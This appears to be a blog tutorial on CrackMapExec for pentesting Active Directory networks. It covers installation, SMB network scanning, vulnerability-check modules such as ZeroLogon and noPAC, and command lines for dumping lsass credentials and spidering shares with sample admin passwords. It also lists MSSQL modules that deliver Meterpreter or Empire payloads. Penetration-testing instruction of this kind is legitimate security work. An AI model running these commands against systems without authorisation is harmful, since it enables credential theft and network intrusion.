CrackMapExec
CrackMapExec

CrackMapExec Tutorial: Pentesting networks

CrackMapExec (also known as CME) is a post-exploitation program that assists in automating the security assessment of large Active Directory infrastructures.

CME was designed with stealth in mind, exploiting built-in Active Directory functionality to achieve its functionality and evading most endpoint protection/IDS/IPS technologies.

How to Install CrackMapExec

If you are using Kali you can install it from Kali repos but I recommend you install it from git source.

apt install crackmapexec

In this article I will install it on a Linux machine but if you need you can use it on Windows or using docker.

First, let’s install some dependencies

apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
git clone https://github.com/Porchetta-Industries/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec

Configure Databases

Configure new Certificate

CME Configuration folder

┌──(rfs㉿local-c2)-[~]
└─$ cd ~/.cme

Change CrackMapExec certificate

┌──(rfs㉿local-c2)-[~]
└─$ vi ~/.cme/cme.conf
┌──(rfs㉿local-c2)-[~]
└─$ openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem

Target Definition

crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt

CME Supported Protocols

SMB
MSSQL
LDAP
SSH
RDP
WINRM

Samba Protocol

We will start scanning a network as an example and then a specific host on the network

crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.91

Search Text Files

crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'poplab!sec' --spider C\$ --pattern txt

CME SMB Modules

Vulnerabilities

SMB ModuleDescription
ZeroLogonModule to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
PetitpotamModule to check if the DC is vulnerable to PetitPotam, credit to @topotam
ms17-010MS17-010, /!\ not tested oustide home lab
dfscoerceModule to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
nopacCheck if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
shadowcoerceModule to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam

Credentials

ModuleDescription
gpp_autologinSearches the domain controller for registry.xml to find autologon information and returns the username and password.
gpp_passwordRetrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
handlekatzGet lsass dump using handlekatz64 and parse the result with pypykatz
hash_spiderDump lsass recursively from a given hash using BH to find local admins
keepass_discoverSearch for KeePass-related files and process.
keepass_triggerSet up a malicious KeePass trigger to export the database in cleartext.
lsassyDump lsass and parse the result remotely with lsassy
maskyRemotely dump domain user credentials via an ADCS and a KDC
teams_localdbRetrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
wdigestCreates/Deletes the ‘UseLogonCredential’ registry key enabling WDigest cred dumping on Windows >= 8.1
wirelessGet key of all wireless interfaces

Scan for Samba vulnerabilities with CME

ZeroLogon

crackmapexec smb <ip> -u '' -p '' -M zerologo

PetitPotam

crackmapexec smb <ip> -u '' -p '' -M petitpotam

noPAC

crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac

Nanodump

crackmapexec smb $TARGET -u Administrator -p 'qwerty12345' -M nanodump
[*] nanodump module options:

TMP_DIR             Path where process dump should be saved on target system (default: C:\Windows\Temp\)
NANO_PATH           Path where nano.exe is on your system (default: /tmp/cme/)
NANO_EXE_NAME       Name of the nano executable (default: nano.exe)
DIR_RESULT          Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)

MSSQL Protocol

CrackMapExec Modules to attack MsSQL Service.

MsSQL Modules

ModuleDescription
empire_execUses Empire’s RESTful API to generate a launcher for the specified listener and executes it
met_injectDownloads the Meterpreter stager and injects it into memory
mssql_privEnumerate and exploit MSSQL privileges
nanodumpGet lsass dump using nanodump and parse the result with pypykatz
test_connectionPings a host
web_deliveryKicks off a Metasploit Payload using the exploit/multi/script/web_delivery module

Leave a Reply Cancel reply